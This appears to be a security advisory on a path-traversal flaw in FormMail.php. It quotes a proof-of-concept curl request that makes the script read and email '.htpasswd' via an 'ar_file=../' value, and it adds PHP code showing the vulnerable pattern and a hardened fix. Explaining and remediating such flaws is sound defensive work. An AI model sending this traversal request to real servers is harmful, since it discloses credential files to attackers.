Joe Lumbroso FormMail.php Arbitrary Remote File Access Vulnerability

The author provided the following proof-of-concept:

Example Attack:

Assume the following:
Script Location : http://yoursite.com/cgi-bin/formmail.php
Password File Location : http://yoursite.com/members/.htpasswd

Use the following curl command to have the password file emailed to you.

# curl -e http://yoursite.com/ \
    -d ar_file=../members/.htpasswd \
    -d email=you@yoursite.com \
    http://yoursite.com/cgi-bin/formmail.php
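The request above works because the `ar_file` field names a server-side file that the script reads and attaches to the outgoing mail, and `../` walks the path out of whatever directory the script expected. The following PHP is an added illustration of that bug class and of a fix; it is not the FormMail.php source and does not reproduce its internals. The two helper functions, the `attachments/` base directory and the temporary files it creates are all hypothetical, constructed so the snippet runs offline.

```php
<?php
// Added illustration of the ar_file path-traversal pattern; not FormMail.php code.
// Both helper names are hypothetical.

// Hypothetical vulnerable pattern: the request value is joined straight onto a
// base directory, so "../members/.htpasswd" escapes it and the script would
// read and mail whatever the web server user can open.
function attachment_path_vulnerable(string $baseDir, string $requested): string
{
    return $baseDir . '/' . $requested;
}

// Hardened version. Two independent controls:
//  1. the request value must exactly match an allowlist of files the form is
//     meant to send (no user-supplied path components at all);
//  2. the resolved path, after realpath() collapses ".." and symlinks, must
//     still sit under $baseDir. This second check guards against a mistaken
//     allowlist entry or a symlink planted inside the attachment directory.
function attachment_path_hardened(string $baseDir, string $requested, array $allowed): ?string
{
    if (!in_array($requested, $allowed, true)) {
        return null;                                   // not an advertised attachment
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . $requested);
    if ($base === false || $full === false) {
        return null;                                   // base dir or file does not exist
    }
    // realpath() never returns a trailing separator, so require "$base/" as prefix.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                                   // resolved outside the base dir
    }
    if (!is_file($full)) {
        return null;
    }
    return $full;
}

// Constructed demo tree under the system temp dir (not real data).
$root = sys_get_temp_dir() . '/formmail_demo_' . getmypid();
mkdir("$root/attachments", 0700, true);
mkdir("$root/members", 0700, true);
file_put_contents("$root/attachments/brochure.txt", "public brochure\n");
file_put_contents("$root/members/.htpasswd", 'alice:$apr1$constructed$placeholder' . "\n");

$allowed   = ['brochure.txt'];          // the only file the form should ever attach
$traversal = '../members/.htpasswd';    // the value from the advisory's curl command

// Vulnerable: returns ".../attachments/../members/.htpasswd", which the OS
// resolves to the password file; a file_get_contents() on it succeeds.
$bad = attachment_path_vulnerable("$root/attachments", $traversal);
echo "vulnerable resolves to: ", realpath($bad), "\n";
echo "readable? ", is_readable($bad) ? "yes" : "no", "\n";

// Hardened: the traversal value is rejected, the legitimate file is accepted.
var_dump(attachment_path_hardened("$root/attachments", $traversal, $allowed));      // NULL
var_dump(attachment_path_hardened("$root/attachments", 'brochure.txt', $allowed));  // ".../attachments/brochure.txt"

// Clean up the constructed tree.
unlink("$root/attachments/brochure.txt");
unlink("$root/members/.htpasswd");
rmdir("$root/attachments");
rmdir("$root/members");
rmdir($root);
```

Note that the file check is only half of the fix for a script like this: the `email` field in the same request lets the attacker choose the recipient, so even a correctly restricted attachment is still mailed wherever the attacker says. A form mailer should take its recipient from server-side configuration, not from the POST body.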


Copyright 2010, SecurityFocus